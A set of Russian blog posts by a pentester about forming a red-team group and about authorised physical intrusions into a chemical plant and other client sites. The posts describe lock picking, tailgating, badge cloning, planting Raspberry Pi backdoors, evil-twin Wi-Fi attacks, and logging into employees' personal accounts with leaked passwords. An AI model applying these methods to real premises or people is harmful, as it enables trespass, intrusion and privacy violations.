Несмотря на то что мы сформировались как живой организм, где каждый отвечал за свою составляющую, мы еще не были достаточно плотно знакомы. Но на игре передай мяч, мы выяснили, что среди нас практически все взрослые ребята и девчата с прикладным опытом: сети, разработка, администрирование. Также присутствовали специалисты по тестированию на проникновение и баг хантеры. Запал в начале был у всех словно напалм - ничем не потушить. Но спустя время некоторые члены команды остыли в направлении своих факультативных задач и стали "прогуливать" свои домашние задания. Это сразу же сказалось на общей картине. Ведь всегда любое деструктивное действие начинается с малого.

В этот момент я связываюсь с лидом и мы начинаем штормить на тему - "А где взять еще экспертов на борт?". В этот момент мы начинаем делать оферы своим знакомым и товарищам. Некоторые из них приходят в команду на чистейшем энтузиазме и начинают помогать. Часть команды, к сожалению, пришлось убрать.

Как вы думаете что было дальше? У нас вроде уже все есть, спецов добрали, компетенции все присутствуют. По идее взяли лыжи и поехали. Но мы начали со структуро-образующих вещей. Было решено сделать общую базу знаний и делали мы ее на базе Obsidian с расширениями общей синхронизации, которая, к счастью логировалась. Почему к счастью? Узнаете позже. И так каждый стал писать в базу либо информацию о Kill-Chains с Bug Bounty, либо методику тестирования в парадигме своих знаний и умений. База стала расти. И случилась очень незавидная история - произошла авто синхронизация заметок личного характера в общий топик. К счастью, у нас легко все вычислилось при помощи навыков опытного администратора, и мы смогли это устранить. Но это вам на заметку - чем опасен ноушен. Далее мы приняли решение - уезжаем в редмайн.

Более сложная настройка, много плагинов, прав доступа, но никаких личных хранений на ПК чувствительной информации (методики тестирования). Единственное, данный шаг сподвигает автоматически на создание корпоративных почт, чтобы можно было проходить процедуру аутентификации. Далее был повешан второй фактор и наша база находится под защитой. Я не буду тут описывать всей архитектуры и пару технических трюков, но концепцию передал верно. Теперь у нас есть роли, права доступа. Выделены люди, кто пишет общую методику, которой мы будем придерживаться. Звучит вкусно.

Так ну теперь то можно идти ломать? Нет, на этом этапе я увидел что наколдовали ребята, занимающиеся администрированием инфраструктуры. Настолько сложной сети для наших задач я еще не видел: там и экономически обоснованные сервера, и экономные ОС, и все это взлетает с автоматизацией. Ну мееед. А самое главное все тесты проходят с тачек, которые логируются и могут в любой момент быть выключены, если заказчик даст понять - у нас ALARM! Вырубайте свою "зубодробилку". Это очень классная история, которую коммерчески реализовать почти не возможно. Почему? - Спросите вы. Да потому что внутри одной команды "пялить" в трафик - это нормально и правильно, а когда в тебя "пялят" разные вендоры и на основе твоих секретиков формируют правила для своих продуктов - звучит как полная ерунда. Но в нашем случае мы всегда имеем лог файл на случай инцидента, чтобы доказать нашу непричастность к неправомерным действиям путем предоставления доступа к инфре и логам.

Так База Знаний есть, Красная Кнопка реализована, что дальше... А дальше Мы проводим первую встречу, и проводим ее очно на сколько это было позволительно для ее участников.

А что было дальше читай в следующих статьях.

150 - именно столько человек пришло на проект.

Итак, команды изначально формировались как отдельные мини группы по 10-20 человек. Идея отбора была сформирована таким образом: группы были собраны для совместного поиска уязвимостей на публичных программах BB. Никакого обучения, влияния, настройки внутри не происходило. Во главе стояла идея формирования маленького автономного и саморазвивающегося коллектива. В такой парадигме по законам природы должен был объявится лидер, специалист какого-либо направления (возможно несколько) и люди готовые помогать в достижении общей цели.

Представьте себе картину, где лидеры групп обладают разными компетенциями в разных направлениях:

Представьте себе например такой состав команды, на изображении он конечно же усечен, но если ужать со смыслового остатка, то такая команда не сможет взломать любую компанию, с любого сектора и любого размера - это какой-то процент компаний с сотрудниками, которые плохо проинструктированы и не обучены противодействию атак. Но представим, что единственным вектором на внешнем периметре будут уязвимости веба или какого-либо сервиса, или вообще нужно будет злоупотребить уязвимым шаблон в ADCS. В таком случае наша группа скорее всего обречена на провал с большой долей вероятности. Успех будет только в том случае, что встретится уязвимость, сервис или плохо лежащий файл или что-то еще, что наш студент, решающий лабы уже когда-то находил. Вывод группа может делать простые проекты, но в большинстве случаев должна быть дополнена другими специалистами.

В такой конфигурации шансов становится намного больше, но есть "но". Ребята заточившие свои мозги под CTF, будут сильно удивлены что багу надо искать не разбирая хеш из изображения, а разбирая исходный код, различные движки и фреймворки. Ни в коем случае не хочу сказать, что CTF-ры ребята не шарящие, наоборот - это профессионалы но с достаточно специфической подготовкой и мышлением. "Внутрянщик" в этой группе может найти баги в сервисах, которые торчат наружу, потому что можно посканить порты, проанализировать что на них висит, поработать с поиском неправильных конфигураций и избыточных разрешений. Шанс на успех есть и в парадигме реальных проектов выше чем у первых ребят. Поэтому данная команда тоже не может работать автономно с гарантией хорошего качества и вероятности успеха 100%. Хотя 100% дать вообще никто не может.

Данная группа имеет огромный потенциал на поиск пробива, компрометацию и выявления "дизастера" для атакуемой компании. Но есть маленькое "но". Баг Хантеры работают под призмой поиска любых баг, чтобы в моменте получить вознаграждение, а нам то нужен полноценный взлом. Безусловно, такие ребята могут найти очень страшные вещи, которые будут страшнее эксплуатации RDCB, Self Relay и MS17-10. Но их мышление заточено не на пробив с целью поковырять инфраструктуру, а найти на поверхности вещи, которые могут привести к остановке ресурса, доступу к ПДн и прочему. То есть расчитывать, что эта группа расколупает и проведет анализ защищенности внутреннего периметра не стоит. Но данная связка сильнее предыдущей для RT проектов.

Такая группа - это диверсанты в полях. У нас есть "Физик", есть аналитик и сетевик - такой бригаде не нужно искать что-то на вебе, они зайдут пешком на объект и поломают вашу Циску, настроят маршруты через малину на свои рабочие станции и спокойно будут сидеть в вашей инфраструктуре, пока ее не одолеют, попутно разбираясь с тем, как ломаются "кишки" компании по типу 1С, СУБД, порталы и другое. Такая команда имеет шансы на успех большие, но будет ряд компаний, где нужна будет поддержка и другими компетенциями - внешка, железо, внутрянка и т.д. Такая группа эквивалентна группе, рассмотренной выше.

Вот это опасная комбинация людей, оговорюсь я тут подразумеваю опытного сисадмина, разраба и менеджера. Такая группа будет заходить через сложные вещи, связанные с обратной разработкой, поиском мисконфигураций, бизнес логикой, социалкой и другими направлениями. Шансы на успех у такой группы приличные, но скорость и производительность будут иметь низкие показатели. Этой команде явно будет нужно набрать разных компетенций, но начать вокруг себя копать информацию и выполнять проект они смогут, не имея методологии по тестированию.

Давайте еще один вариант рассмотрим, который был отмечен. Очень интересная группа, которая может двигаться по следам компрометации пентестеров, хакеров, да вообще кого угодно. Такая комбинация специалистов сможет выполнить небольшую часть от общего числа проектов, но за то это будет изящно и максимально скрытно.

Но как вы понимаете из огромного количества людей осталось совсем немного. И не потому что кто-то был плох, а кто-то хорош. Некоторые не смогли удержаться из-за отсутствия времени, кто-то взял резкий старт и потом словил стагнацию, у кого-то не совпали ожидание-реальность. Это естественный процесс отсеивания команды. В итоге у нас сформировалась группа, с которой все и началось. Это была единственная группа с высоким уровнем самоорганизации.

Пока другие решали лабы, думали как разработать малварь или стартанули заливать на свои SSD тонны курсов и книг, лидирующая команда развернула сетевую инфраструктуру, обзавелась почтой и настроила базу знаний. У ребят во главе был лидер с большим опытом управления - это бесспорно "чит". Но стоит отметить, что в других группах были люди, которые самостоятельно выполняли задания и сдавали об этом отчет.

А были те, кто говорил, у нас нет лидера, никто не делает минутки встреч и вообще я не понимаю что происходит. Это тоже нормально, но каждому из участков выпал шанс реализовать себя, пройти тестовые задания чтобы попасть в ту саму группу, которая на момент конечно переброса людей составляла 25 человек.

С этого места все и началось. Именно на этом моменте происходила отладка, интервью кандидатов, создание методологии и архитектуры будущего проекта. На этом моменте сформировалась команда этичных хакеров, которые начали свой совместный путь.

В других частях мы разберем:

- первые проблемы

- роли внутри

- состав компетенций

- финансовые задачи

- построение сетевой архитектуры

А также первые встречи вживую и много другое.

Все события и участники были изменены, и все совпадения являются случайными.

Хочу подчеркнуть, что информация, которую вы получите после прочтения статьи, носит исключительно обучающий характер, не является призывом к действию и не может использоваться в злонамеренных целях. Моя цель — показать недочеты и уязвимости, которые необходимо устранить ИБ-специалистам в их организациях, а также показать как работают эксперты в направлении кибер учений.

Предыстория

Прилетел заказ из компании, занимающейся химической обработкой сырья. У них - два цеха, административное здание, пропускной режим, охрана от Росгвардии, камеры, СКУД и куча уверенности в себе.

Сроки - горят. Чтобы забрать проект надо было буквально ехать вчера. У них через два дня - аудит, от какого-то центра 7+1, и надо срочно провести репетицию физического пентеста, чтобы закрыть явные баги, дабы спаси себя от набутыливания.

На разведку - ноль времени. Вот пока добираешься до места тестирования, тогда и изучаешь, ну что смеяться, тут уже проще оттолкнуться от фактической картины. Пришел и по месту побродил. Ни тебе фотографий, ни планов, ни списка подрядчиков, ни схемы СКУД. Сразу в поля.

В таких случаях я работаю по принципу: "Наблюдай. Импровизируй. Адаптируйся. Побеждай."

Этап 1: Быть в теме

Утро. 07:50. Подъезжаю к проходной как раз в момент, когда тянется вереница рабочих. Все в одинаковых куртках, касках, с рюкзаками.

Я заранее переоделся в поношенную куртку с логотипом логистической компании (Покупал в целом для проектов на производстве), касочка синяя и рюкзачек.

Стратегия простая: найти фишку местных бизнесменов. Это такое место откуда ребята тащат чего-нибудь домой (металл, пакеты, одежду, всякий списанный хлам и т.п.)

Поскольку я сам из города, где есть промка, прекрасно знаю, что “не бывает завода без желающих нажиться на имуществе”. Избалованные городские жители могут сказать, что это никому не нужно, но уверяю вас вы не правы. Можете почитать труды Фредерика Тейлора (https://archive.org/details/principlesofscie00taylrich/page/105/mode/1up).

Еще с тысяча девятьсот лохматых годов, было выявлено, что люди которые работают на предприятиях работают там в пол силы, чтобы работы хватило всем или из принципа мой сосед халтурит и я буду. Но тут суть кроется именно в наличии свободного времени и приобретенной “смекалки”, которая шепчет в голове -”Есть вариант урвать, смотри какая медная жила лежит. Давай ее вынесем, она все равно никому не нужна, третью неделю тут валяется…”. Возвращаясь к нашей ситуации, я нашел такое место, там был забочик, который можно было открутить аккуратно ключом на 10 и зайти. Почему это то самое место, откуда происходят материальные выбытия предприятия? Да потому, что там вытоптанная дорожка в поле до места, где может подъехать машина и находится это все на “заднем дворе”. Плюс небольшой анализ показал что за забором ни камер, ни людей, тишь да гладь.

Initial Access получается.

Этап 2: Исследование внутренней среды

Теперь поиск БЩУ, офисов, кабинетов… Вы представляете как выглядит на хим. перерабатывающем заводе? Собственно, там даже климат свой, осадки могут быть такой кислотности, что металл за относительно не большой срок службы превращается в труху, кто был на подобных предприятиях знает.

Короче много тут не находишь, спалят на вопросе, а где твой наряд-допуск. У меня этого естественно не было. Единственное, был газик, про который я забыл упомянуть выше, на таких предприятиях он нужен для себя же.

Короче просто смотрим где щеголяют сотрудники в чистой одежде. На территории предприятия были строгие зоны для курения и это очень хорошо. Там можно постоять и послушать контекст разговоров. Если есть необходимость и вопрос задать.

Я ничего не понял из разговора, кроме бытовых историй, поэтому пришлось встрявать в разговор.

Через пару минут общения и просьбы поделиться сигареткой:

• А как у вас найти инженеров по безопасности?
• Я не в курсе, а что ты хотел?
• Да вот прислали к вам чтобы избавлять от винды, на Астру скоро перейдем...

Через 10 минут болтовни с рабочими я уже в курсе:

• где серверная (маленькая «тёплая» комната в правом крыле),
• кто туда ходит (айтишник Жека и мастер участка),
• и что замок на двери в серверную — просто механика, не СКУД.

Заводчанин вообще не подозревал, что его “не знаю” оказалось еще каким “знаю”.

Знаете какой тут используется прием? Как у следователей, которые распутывают дела и их свидетели ничего не видели, никого не знают и сколько времени было не помнят. В таких случаях задаются вопросы по типу, может ты видел на стене часы или на руке коллеги, а может в телефон смотрел? А журналы какие-то были на столе? А не помнишь что за изображение на них было? А что шло по телевизору в этот момент? Может помнишь жарко было в этот момент или уже холодало? Короче я могу сюда написать 1000 и 1 вопрос, который поможет человеку вспомнить для вас полезную информацию.

Короче нашел я это помещение, но идти туда прямо сейчас было не вариант. Мне пришлось зайти и зависнуть “на звонке” до обеда. По моим наблюдениям лестничная площадка лучшее место для этих дел. Почему? Потому что, если вы будете тусоваться около машинного зала или БЩУ или в тех местах, где могут проходить работы, вас 100 процентов спросят кто вы и что вы. Качать права там не всегда уместно. Поэтому я выжидал обеда, там как по расписанию и без опозданий все дружно уходят.

Этап 3: Проникновение в серверную

На обеденном перерыве часть персонала ушла таки в столовую. Серверная — рядом. Я подхожу, выглядываю: никого.

Быстрая работа отмычкой, был мой любимый перфо-профиль, замок открывается за минуты 2. Тут стоечки, порты, все круто, но на тесте я не получил IP адрес, попытался прописать и ничего не вышло. Тут элемент удачи. Здесь не вышло, я вышел из комнаты и пошел искать другие места с выходом в ЛВС Заказчика.

Тут было куча помещений с стеклянными дверьми. Местами сидели дежурные, которые контролировали внутреннее перемещение, там стояла вертушка. Не вариант. Я нашел помещение, с ультра сложным профилем, туда или мультипик или петерсон, там реально надо было фольгой ковыряться. Ну вариантов не было, сел ковыряться, переодически ходили люди смотрели, но видимо думали что чиню замок. Я не брал с собой спиннер и мне пришлось два оборота набирать заново. Искренне скажу, что это был один из самых сложных профилей для вскрытия. Я и слабый и сильный натяг пробовал, просто непредсказуемость какая-то вышла с этим открытием.

Ну тут окей, стояли несколько ПК, через Kali Live я забрался и пошифрованый диск, полное Г.

Снял мак и айпишник, прописал сетевой конфиг и залез в сетку, тут уже дела пошли лучше и мне удалось поснифать трафик, дотянуться до DC, на этом этапе малина была подключена самым грязным способом.

Потом как в пэкет сквирел, бомбим VPN соединение и пользуемся полноценной хостовой тачкой внутри сети, которая стреляет наружу трафиком. Вот не достать было этой штуки же, сейчас можно, у нас в сообществе есть ребята, которые помогут с этим вопросм.

Ну все, подрубаемся к малине и погнали бомбить инфру :)

Этап 4: Отход и результат

Закрываю дверь, естественно закрывать на ключ не стал - это мазохизм. Вернулся к курильщикам, пару минут болтовни и направился к месту для “местных бизнесменов”.

Внутрянщики отработали свою часть. проект был успешно завершен.

Отчёт написал в ту же ночь.

Клиенты в приятном шоке, на следующий день в формате аудита пофиксили вероятности проникновения, но меня заверили, что 7+1 центр не пользуется на таких проектах отмычками. Ох как же они заблуждаются. Вообщем я порекомендовал по полной программе поставить доп камеры, датчики, местами влепить СКУД по мимо механических замков, провести обучение персонала. Кстати на обучении все с удовольствием слушали и практиковались на моих инструментах, тоже важная часть на самом деле. Естественно мы с вами понимаем, что Заказчик не смог бы физически все устранить и поставить оборудование, но обратить внимание на ключевые поинты и выстроить монитиринг ребята смогли. На счет митигации и устранения уязвимостей внутряка не знаю успели ли все сделать или нет. Но мы вместе на “разборе полетов” сидели и частично закрывали явные криты и мисконфигурации в домене. Короче дальнейшую судьбу предприятия не знаю, но на момент завершения работ и нашего сотрудничества все было круто и Заказчик остался довольным.

Спасибо дорогой подписчик за твое внимание, а если заинтересовался моими работами, пиши в личку, обсудим ;)

Ещё больше интересного в моем ТГ канале: https://t.me/pro_pentest

А также на YouTube канале: https://www.youtube.com/@pro_pentest

Все события и участники были изменены, и все совпадения являются случайными.

Хочу подчеркнуть, что информация, которую вы получите после прочтения статьи, носит исключительно обучающий характер, не является призывом к действию и не может использоваться в злонамеренных целях. Моя цель — показать недочеты и уязвимости, которые необходимо устранить ИБ-специалистам в их организациях, а также показать как работают эксперты в направлении кибер учений.

Итак, увлекательное путешествие началось, когда мне позвонил с утра представитель сломанной организации и попросил посчитать КП на услугу. Обычно в такие моменты я собираю как можно больше информации, но к сожалению, в этот раз меня не стали посвящать в подробности и попросили об очной встрече.

Во время беседы с Заказчиком я понял, что ребята уже проводили не один пентест, им есть над чем поработать и снаружи и внутри, но при этом на фоне некоторых событий захотелось проверить насколько они защищены физически.

Я плюс-минус перед встречей посмотрел что за компания, чем живет, но более детальной информации так и не получил. Мы договорились подписать NDA с обеих сторон. и приступать к работе.

Итак, пока у нас есть название компании, надо теперь искать информацию отовсюду. Тут поможет глубинный анализ технологий, сотрудников, топов, клиентов, партнеров, а также геопозиции самого объекта.

Первым делом мы начали шерстить LinkedIn. К сожалению, я не могу тут вставлять скрины, поскольку практический OSINT без согласования не может быть опубликован.

Сама механика достаточно простая - мы начали просто искать сотрудников из данной компании и выписывать в табличку информацию, мне почему то в этот раз захотелось это поделать в excel.

Далее мы начали собирать информацию со слитых баз Leakcheck и ему подобных сервисов-коллабораторов. Там было много интересного и полезного, но цепочка раскручивалась примерно так: сотруднику дали бонусы в онлайн магазине, если он зарегестрируется по корпоративной почте (стандартные бенефиты компаний). Мы заходили используя эту почту и слитый пароль. А там внутри уже были контактные телефоны сотрудников, которые привязаны к телеге, воцапу и прочим сервисам, различная информация по покупкам, корзине и прочему. Получилось собрать много нужной информации, которая потенциально могла использоваться коллегами для проведения социалки (вишинг + фишинг) или на этапе внутрянки. Пример того как это выглядит можно увидеть ниже:

Сначала нашли инфу о топе в ИТ отделе, потом пошли технические спецы, которые по предварительной информации сидели в разных сегментах сети. На этом этапе мы составили полноценное досье сотрудников, которое можно было бы использовать для внедрения в организацию или заведения знакомства. Я покажу как это выглядело у нас, но а вы в своих проектах используйте систему ведения находок, которая будет лично вам удобнее:

На этом этапе мы понимали в кого слать фишинговое письмо (эти работы проходили параллельно с физикой), чтобы попасть в нужный сегмент, поскольку выяснили чем занимаются сотрудники и какие функции выполняют через беседу с HR. Эта информация еще нужна в случае, если нас выцепляют на территории, то мы можем бравировать нужными фамилиями и на крайний случай позвонить (Нагло? А почему бы и нет!), не сразу же авторизационное письмо подсовывать, нужно отыгрывать до конца. Еще как вариант в таких случаях - это попробовать скопировать на себя образ личности, которой мы хотим представится (может спасти на проходных, если вы проходите по чужому пропуску).

Далее наше внимание было нацелено на соц сети, где мы нашли много фото с компрометирующей информацией, такой как фото документов, ключей и прочей полезной штуки. Также порадовали статьи на изместном ресурсе, где на фотках мы определили как выглядит предприятие изнутри.

Для соблюдения профессионального тона мы на всякий случай сделали дубликат ключа, который обнаружили на фото из социальных сетей сотрудника (а вдруг подойдет). Как это я делал? Кидай вопрос в комменты, сделаю на Ютубе разбор на своем примере.

Не стоит также упускать из вида разные снимки и планы зданий из статей, карт, и прочего, например обзоры обновлений или презентация предприятий во время их открытия/реставрации на видео-площадках. Собственно мы такую возможность не упустили:

Для потенциальных работ по WIFI мы сделали карту точек доступа (в основном это делается сбора учеток, где мы пользуемся eaphammer в контексте атаки "Злой двойник"), но это уже относится к физической разведке (покататься на тачке вокруг или походить, тут как позволяет уже ситуация):

Дальше как вы понимаете пришло время посмотреть замочки по контуру и лазы, которые могли оставить сотрудники предприятий самостоятельно (бывает такие вещи делают чтобы через проходную не выходить). В этом случае за вас уже продумали как выйти и не попасть под камеры и надзор охраны.

Замочки мы посмотрели, стандартный набор из навесных Apecs, которые отщелкиваются при помощи боготы на раз два, и английский профиль на внутренних калитках (через бинокль было не особо понятно что за фирма у замков).

Далее нам предстояло понять что с постом охраны, как часто они переключают камеры и в целом смотрят ли за ними. Сложилось ощущение, что ребят на этом проекте предупредили и они пялили в мониторы постоянно, как будто там интересная передача а не статичная картинка и еще что-то в моменте обсуждали. Бдительные охранники даже жалюзи прикрыли, чтобы их не было видно. Но пока мой коллега ползал по периметру никто не реагировал и не менял свое поведение. Это могло только значить одно, камеры в автоматическом режиме не переключаются и не инициируются при помощи датчика движения. Окей, время обхода мы зафиксировали, теперь можно готовить рюкзаки и проверять на сколько наша аналитика верная.

Собираясь в ночную смену, мы сложили свой стандартный инструмент, но ориентировались на высокую физическую активность, поэтому делали акцент только на максимально необходимых вещах, и размещали их в местах быстрой доступности (тут у меня возникла идея сделать удобные штуки для быстрого пользования инструментом, которые можно будет пристегивать к одежде, но это находится на проекте проектирования). Это картинка из интернета, тут под каждую задачу свой пак нужно собирать.

Кстати теперь буду рекомендовать Multipick , поскольку это один из самых лучших инструментов в мире, заточенный под свои задачи. Это собака пролезет в самый кривой и тонкий профиль. Вообщем можно купить китайский инструмент, но в определенных кейсах, он может подвести.

Теперь время повеселиться. GoPro на 1080 60 кадров в секунду и погнали. С ростом числа проектов адреналин для первого шага исчезает и мы с коллегами спокойно искали места, ранее разведанные для InitiaI Access. Самое банальное это заход через внешние пожарные лестницы, перекусываение проволоки забора (тут исключительно нужен качественный болторез, кусачки идут мимо), откручивание проф листа или вскрытие дверного замка. Кстати на этом проекте наши кусачки потерпели поражение. Мы выбрали самый быстрый способ и прошли первый контур.

Прошу обратить внимание на картинку выше. Иногда замок заведомо переворачивают, поэтому такое можно увидеть на проектах и если нет тренировки работать снизу вверх клюшкой - могут возникнуть временные трудности в прямом смысле слова.

Мы внутри. И тут уже пошел адреналинчик по венам, но в хорошем плане. В этот момент ты обычно чувствуешь небольшой холод (у меня лично по спине) и включается в голове умеренная тревожность, обостряется слух и зрение. В этот момент нужно быстро решить что делать дальше, мы принялись искать место, которое максимально близко было к нашей цели и имело конструктивные особенности, позволяющие забраться альтернативным способом в целевое помещение.

Многие из вас, кто меня начал недавно смотреть/читать могут озадачится вопросом: чего за конструктивные особенности? Тут я подразумеваю строительные леса, пожарные лестницы, переходы между корпусами, открытые окна на досягаемых этажах, строительные элементы из бетона и тому подобное, что поможет достигнуть поставленной цели. Стоит упомянуть что пожарные лестницы бывают достаточно удобными, а не те, которые висят на 5 этажных жилых домах, хотя и такие встречаются.

Кто-то у нас подпер брусочком запасную дверь (большое спасибо). Отмычки уже устали отдыхать. Внутри мы нашли план помещения (стандартная пожарка, которая обязана быть), зафиксировали ее и пошли к нашей цели. На пути мы столкнулись с перфорированными замками фирмы Dorma, которые открылись достаточно быстро, и мы попали в блок управления с резевным питанием. Ну тут особо для нас не было ничего интересеного, поэтому мы пошли дальше. Далее были серверные, которые с одной стороны помещения закрыты на СКУД, а с другой был перфорированный замок, который идет в комплекте с дверями-консервами. Такую дверь за минутку мы победили и попали в нужный нам блок где была цель. Там мы повтыкались с ноута к портам (искали рабочие), потом обнаружили в одной из комнат, которые также были закрыты принтер и там через манипуляцию обхода портсека протестирорвали подключение ноута к внешнему серверу, а потом и малинку воткнули. А как мы попали в эту замечательную дверь? В одном из помещений была обнаружена на стене доска из пробкового дерева, на которой был закреплен пропуск (спасибо большое), тут в игру идет флиппер и забирает метку себе в память.

На этом этапе нам осталось надежно спрятать малинку с роутером и уйти. Тут кто как прячет, кто-то в сетевые фильтры, кто-то в роутеры, кто-то в щитки, короче полет фантазии.

Мы успешно ушли тем же путем и в целом все прошло тихо, но на следующий день нас попросили провернуть эту манипуляцию днем. Мы на самом деле уже заведомо шли "на убой". Ну а какие варианты? Про нас уже наверняка знают, камеры посмотрели, хотя Заказчик убеждал в обратном. Но как говорится мы танцуем вы платите. Пошли днем, была куча народу, щеголяющая по предприятию, мы нашли коптерку с желтыми жилетами, в которые сразу вкинулись. Вуаля, мы подрядчики, а не хакеры, провернули туже операцию номинально, но уже днем. Засняли красивое кино с нескольких камер и отдали довольному заказчику. С отчетом как всегда пришлось повозиться, поскольку видео с камер и с экшен камер бывает недостаточно. В целом заказ выполнили, заработали репутацию и денег. Хочу подметить что я не описывал часть, где мы ломали внутряк, внешку или делали социалку, поскольку там каких-то рокет сайнс цепочек не было (все по стандарту). Спасибо дорогой заказчик что выбрал лучших среди профессионалов, надеемся на дальнейшие совместные проекты и тесное сотрудничество. Если вы придете к нам по рекомендации, обязательно это укажите (и от кого), поскольку для своих у нас есть определенные бенефиты.

Ещё больше интересного в моем ТГ канале: https://t.me/pro_pentest

А также на YouTube канале: https://www.youtube.com/@pro_pentest

Всем привет! Давно не было историй. В этот раз речь пойдет об очень интересном проекте, который я не могу расписать в красках, поскольку он под жестким NDA, поэтому все события и участники были изменены, и все совпадения являются случайными.

Хочу подчеркнуть, что информация, которую вы получите после прочтения статьи, носит исключительно обучающий характер, не является призывом к действию и не может использоваться в злонамеренных целях. Моя цель — показать недочеты и уязвимости, которые необходимо устранить ИБ-специалистам в их организациях.

Итак, начнем. Поступил нетиповой запрос от крупной компании на проверку по модели Red Team. В рамках этих работ было несколько команд:

1) Координаторы

2) Потрошители внешки

3) Support C2

4) "Физики"

5) Ответственные лица со стороны Заказчика

В контексте этого проекта моя роль заключалась в "лидировании" проекта и непосредственном участии.

С ролями разобрались, теперь к сути. Задача — сломать Заказчика любым способом с учетом противодействия. Наша миссия в этом проекте имела приличный вес, поскольку требовалось продемонстрировать все возможные векторы атаки.

Я буду рассказывать про работы команды "физиков". Заказчик обозначил цель — штаб-квартира и стратегический объект со складами и технологическими ресурсами.

Первым делом мы начали прорабатывать часть, связанную с OSINT. Информация, полученная на этом этапе, очень сильно помогла в планировании работ, подготовке оборудования и расчете трудозатрат.

Настало время подготовки оборудования. Поскольку векторов в буквальном смысле было очень много, нам пришлось везти с собой на объекты четыре 120-литровых чемодана и шесть рюкзаков, не считая небольших сумок. Помимо железа, снаряжения и инструментов, мы подготовили пакет документов в виде нескольких договоров на проведение работ, а также авторизационных писем (в этом плане всегда рекомендую прогонять документы через юристов, чтобы не выстрелить себе в ногу).

Еще один неотъемлемый момент заключался в подготовке техники для фото- и видеофиксации. Почему это так важно? В экстремальных условиях будет крайне неудобно и сложно пользоваться смартфоном. Представьте: вы стоите одной ногой на выступе 5 см, под вами 20 метров пустоты, и вы вскрываете дверцу в щитовую. Думаю, вряд ли захочется фиксировать свои действия с учетом большого риска сорваться вниз. А любое упущенное доказательство компрометации очень сложно подтвердить на этапе написания отчета. Поэтому — экшн-камера! Выбор моей команды и мой — это GoPro с креплениями PGYTECH. Кстати, крепления сделаны как прищепки с замком на лямку рюкзака, а вместо болтика-фиксатора используется быстросъемный зажим (очень удобно и быстро можно поменять батареи в камере).

Приблизительный список того, что мы взяли с собой:

Техника:

- Ноутбуки: MSI, MacBook, MSI для HackRF

- Raspberry Pi: 4B (1 шт.), Pi Zero (2 шт.)

- GoPro + крепления, аккумуляторы (4 шт.)

- Flipper + модули

- Proxmark (3 шт.)

- HackRF + антенны (2 шт.)

- Alfa: большая и маленькая с антеннами

- Рации с антеннами (2 шт.)

- Модем

Зарядные устройства:

- Зарядки для ноутбуков (3 шт.)

- Зарядки для раций (2 шт.)

- Powerbank: большой (20000 mAh) и малый

Инструменты:

- Паяльник + припой

- Пассатижи

- Отмычки (комплекты: английский, перфорационный, сувальдный, самоимпрессия)

- Фонари: обычный и налобный, а также для замочных скважин

Сетевое оборудование:

- Патч-корды

- Type-A - Ethernet переходник

- SD-card reader

USB-устройства:

- BadUSB Cactus + корпуса (15 шт.)

- Обычные флешки

- Live CD

Снаряжение:

- Промальп-снаряжение

- Балаклава

- Перчатки (5 пар)

Документы:

- Паспорта

- Удостоверения (промальп)

- Документы по проекту (договор, авторизационные письма)

- Мерч атакуемой компании

Расходники:

- Армированная изолента

- Двусторонний скотч

Следующий этап заключался в формировании плана работ - что за чем следует, в каком порядке будем проводить разведку и этапы реализации атаки. В наших проектах есть интересная особенность мы можем днями и неделями проводить наблюдение за объектом, а можем поймать уязвимый момент и воспользоваться вектором мгновенно. Мы с командой наметили точки входа на основании GEOINTа, проведенного на предыдущем этапе. Но как это бывает в большинстве случаев окружение объекта поменялось, вектора пропали, и нужно было все планировать по новой.

Далее наступает этап разведки/совершения активных действий. Как я описывал ранее данный этап сложно вынести в отдельный, потому что он может быть выполнен одновременно с проведением атаки. На данном этапе мы достаточно спокойно себя вели, обследовали территорию того объекта, который стоял по плану. Прикольно было получать снимки спящих охранников, или видеостену, которая просвечивалась ночью. К сожалению фото через монокль не получались достаточно качественными, чтобы идентифицировать что происходит на экране, но мы прекрасно понимали сколько камер одновременно доступны для просмотра.

Для более гибкой коммуникации мы использовали рации с гарнитурой для поддержания непрерывной связи, потому что наша группа разбивалась и работала парами. На протяжении всего этапа мы записывали маршруты, время пересменки, привычки и особенности у охраны. Мы получили много полезной информации, которая нам помогла в дальнейших действиях.

Настало время активных действий. Мы наметили вектора, выяснили, когда и как нам лучше проникать. Короче с трудом мы вскрыли на периметре дверь с английским профилем, к сожалению, очень трудно это было сделать китайским инструментом, он просто еле пролазил, тут бы не помешал Multipick. Передвижение по периметру было в спокойной форме. Бег по территории мог вызвать подозрение. Поскольку мы работали в парах, наши коллеги остались за периметром в ожидании команды использовать свой вектор для преодоления внешнего контура. Но был очень большой риск раскрытия, поэтому ребята докладывали обстановку снаружи. Мы проникли во все точки, которые были под защитой механических замков (видимо стоял дешевый Китай, открывались очень быстро). На этом этапе мы зафиксировали все критические узлы, на которые можно было воздействовать и отправились к основным целям.

Далее нам удалось завладеть пропуском в ходе изучения зданий внутри их периметра. Мы обычно составляем план помещений при помощи magic plan, но тут не было такой необходимости, планы висели на стене.

На следующим этапе мы с коллегой разделились - он пошел выставлять аппаратный бэкдор.

А я пошел вскрывать серверные комнаты, да тут конечно и СКУД был, но присутствовали двери с перфо-профилем, которые вели также к цели. Не скажу что первая дверь далась быстро (использовал технику прочеса), но последующие открывались достаточно хорошо, с условием использования попинового прожатия (в среднем уходило 20 секунд на вскрытие). Но были двери с интересной англией и туда мой инструмент просто не мог протиснуться (такие двери остались неоткрытыми).

После выполнения всех намеченных действий, мы эвакуировались к нашей группе.

Нам предстояло посетить в этом же городе штаб-квартиру, где преследовалась таже цель - проникновение и закрепление через аппаратный бэкдор. На этом этапе нам удалось обойтись без пропуска. Мы позвонили в соседствующую организацию бизнес-центра "А" и представились клиентами, которые хотят очно обсудить условия сотрудничества. На ресепшен нам выдали пропуска и таким образом мы преодолели первый контур. На этаже нас ожидал СКУД, который стоял номинально, поскольку используя атаку tailgating мы зашли в холл, и последовали на кухню, чтобы послушать о чем говорят сотрудники и сформировать действия.

Зрительно мы прикинули куда можно зайти чтобы воткнуться в сетевую розетку и практически сразу же пошли социалить сотрудников. Прикинувшись саппортом мы воткнулись вместо принтера в сеть. Проверили, что команде по поддержке C2 пришел отстук и ретировались в поисках дополнительной точки подключения. Второе подключение сделали за панелью потолка и выставили наблюдение по портативным камерам. На этом наша работа в этом контуре была завершена, ребята начали аккуратно пролезать в инфраструктуру, а мы поехали собирать драфт отчета о проделанной работе (и конечно же монтировать кино – такой экшен нравится всем).

